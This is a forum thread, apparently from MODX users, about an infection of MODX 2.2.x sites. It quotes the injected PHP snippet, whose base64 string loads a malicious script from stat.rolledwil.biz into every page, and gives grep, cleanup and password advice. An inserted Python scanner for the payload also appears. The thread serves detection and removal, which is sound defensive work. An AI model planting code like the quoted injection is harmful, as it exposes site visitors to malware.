  • franklinveaux, I am not 100% sure either but does have shared symptoms regardless of user creation or not. Was your site ever on a previous version of MODX—especially in the last 4 months?
      Author of zero books. Formerly of many strange things. Pairs well with meats. Conversations are magical experiences. He's dangerous around code but a markup magician. BlogTwitterLinkedInGitHub
      I am having the same problem 2.2.14pl - at least I know it's not just me. Has anyone found any files other than cache.php which can be removed? My problem seems to have appeared since the hosting company moved my site to a new server.
      • Check for users you didn't create. Manually empty the core/cache/ directory. Look for files with unusual creation or modification dates, and check them for strange, uncommented and out-of-place base64_decode() functions, like the one described above, or if you have a command line or tool for searching multiple files, search for at least part of that encoded string.
        if ($_SERVER["HTTP_REFERER"] != '') {
            $linker = base64_decode("PG5vaW5kZXg+CjxzY3JpcHQgc3JjPSIvL3N0YXQucm9sbGVkd2lsLmJpei9zdGF0LnBocD88cmVwbGFjZT4iPjwvc2NyaXB0Pgo8L25vaW5kZXg+");
            $param = str_replace('.', '', $_SERVER['SERVER_ADDR']);
            $linker = str_replace('<replace>', $param, $linker);
            $this->modx->resource->_output = str_replace("</body>", $linker."\n</body>", $this->modx->resource->_output);
        }

        If you take that coded string and run it through an online decoder, like http://www.base64decode.org/, it does decode into that javascript link:
        <noindex>
        <script src="//stat.rolledwil.biz/stat.php?<replace>"></script>
        </noindex>


        Example command for searching for this via the command line:
        grep -H -r 'base64_decode("PG5vaW5kZXg' /home/myuser/public_html

          Studying MODX in the desert - http://sottwell.com
          Tips and Tricks from the MODX Forums and Slack Channels - http://modxcookbook.com
          Join the Slack Community - http://modx.org
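A small scanner that automates the checks listed in the post above (an added example, not code from the thread or from MODX; the directory layout, the 30-day threshold and the sample files are my own assumptions): it decodes every base64_decode("...") literal found in .php files, flags those that decode to script or noindex markup like the injected snippet, and reports files modified recently.

```python
import base64
import os
import re
import tempfile
import time
from pathlib import Path

# A base64 literal passed straight to base64_decode(), as in the injected snippet.
B64_CALL = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]{16,})["\']\s*\)')
# Markup that has no business being hidden inside a PHP string constant.
SUSPICIOUS = re.compile(r'<script|<noindex>|<iframe', re.IGNORECASE)

# The encoded string quoted in the thread, embedded in a constructed "infected" file.
INJECTED_B64 = ("PG5vaW5kZXg+CjxzY3JpcHQgc3JjPSIvL3N0YXQucm9sbGVkd2lsLmJpei9zdGF0LnBocD88"
                "cmVwbGFjZT4iPjwvc2NyaXB0Pgo8L25vaW5kZXg+")
INFECTED_SAMPLE = ('<?php\nif ($_SERVER["HTTP_REFERER"] != \'\') {\n'
                   '    $linker = base64_decode("' + INJECTED_B64 + '");\n}\n')
# Constructed clean file: a base64 call that decodes to plain text ("hello world").
CLEAN_SAMPLE = '<?php\n$greeting = base64_decode("aGVsbG8gd29ybGQ=");\n'

def decode_calls(php_source):
    """Return the decoded payloads of base64_decode() literals that look like injected markup."""
    hits = []
    for m in B64_CALL.finditer(php_source):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:
            continue  # not valid base64, so not the pattern we are hunting
        if SUSPICIOUS.search(decoded):
            hits.append(decoded)
    return hits

def scan_tree(root, recent_days=30, now=None):
    """Walk root and report .php files with injected payloads or a recent mtime."""
    now = time.time() if now is None else now
    findings = []
    for path in Path(root).rglob("*.php"):
        payloads = decode_calls(path.read_text(encoding="utf-8", errors="replace"))
        age_days = (now - path.stat().st_mtime) / 86400
        if payloads or age_days < recent_days:
            findings.append({"file": str(path), "name": path.name,
                             "payloads": payloads, "age_days": round(age_days, 1)})
    return findings

def demo_scan():
    """Build a constructed tree (one old clean file, one fresh cache.php) and scan it."""
    root = tempfile.mkdtemp(prefix="modx-scan-")
    clean = Path(root, "index.php")
    clean.write_text(CLEAN_SAMPLE)
    old = time.time() - 400 * 86400  # backdate so only the injected file is "recent"
    os.utime(clean, (old, old))
    Path(root, "cache.php").write_text(INFECTED_SAMPLE)
    return scan_tree(root)

if __name__ == "__main__":
    for f in demo_scan():
        print(f["file"], f["age_days"], "days old;", len(f["payloads"]), "payload(s)")
```

Run it against a real install as scan_tree("/home/myuser/public_html") and treat every reported payload as something to read by hand before deleting the file.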
          Thanks Susan and all,
          I have found the files and code and removed where necessary which has stopped the popup appearing on Android phones. I note that the offending files on the server were both dated the same day that I upgraded to 2.2.14 but the original files uploaded from the .zip file are clean. It would appear that the infection may have occurred on that day or else the files were changed without affecting the date stamp on the files.
          I will continue to monitor to see if reinfection occurs.
          There are no unusual users registered on the site as all new users are moderated carefully.
            I believe this attack does in fact represent a zero-day exploit of 2.2.14. I've seen it on sites running 2.2.14, and when I deleted the malicious cache.php from my install and reloaded from a clean copy of 2.2.14, the attack recurred within 24 hours.
              Additional information:

              The malicious Javascript at stat.rolledwil.biz/stat.php checks both the referrer header and the browser user agent when it decides what action to take. It will serve up the malicious script only if the referrer matches the encoded IP address in the URL and the browser user agent is an Android browser.

              The server at stat.rolledwil.biz is behind the Cloudflare content delivery network. I've dealt with Cloudflare in the past; they have a hopelessly dysfunctional internal abuse procedure (I've seen phish sites they're distributing remain active for more than 60 days after they've been notified they're serving a phish). I've notified Cloudflare they're serving a malicious Javascript that leads to malware, but I frankly do not expect them to take any action.
                Indeed:

                https://wordtothewise.com/2012/07/cloudflare-and-spamhaus/

                http://bluetack.co.uk/forums/index.php?showtopic=20449

                In addition, Cloudflare makes it hard to block miscreants by sending their own IP number rather than the real one.
                  Did I help you? Buy me a beer
                  Get my Book: MODX:The Official Guide
                  MODX info for everyone: http://bobsguides.com/modx.html
                  My MODX Extras
                  Bob's Guides is now hosted at A2 MODX Hosting
                  I have checked my site and indeed the cache.php file has appeared again overnight, which I have removed again. However, it had not yet inserted the code into /core/model/modx/modresponse.class.php at line 188, and my Android phone is not giving me a message when I access the site. core/cache had a heap of references to cache.php. I will monitor it and see if I can track what triggers that code insertion.

                  However, how to find what causes the file to appear, where it comes from, and how to stop it?
                  • Change all of your passwords, and usernames where possible. CPanel, FTP, MODX Manager, everything. You can also set the permissions on the index.php, config.inc.php, and any other core .php files to read-only.
                      I'm glad I came across this thread, as I've just been updating a new client's 2.2.4 installation (yes, I know it needs updating!!). I'm mentioning the version to show how far back the vulnerability goes - I'm assuming it's MODX related, although I haven't come across it yet on any MODX installs on my own dedicated server.

                      I found it had added the cache file, modified the response file, and there was also an unknown user.

                      Thanks so much for the instructions on how to remove it. I found it was affecting the load time of jquery and breaking things like image lightboxes.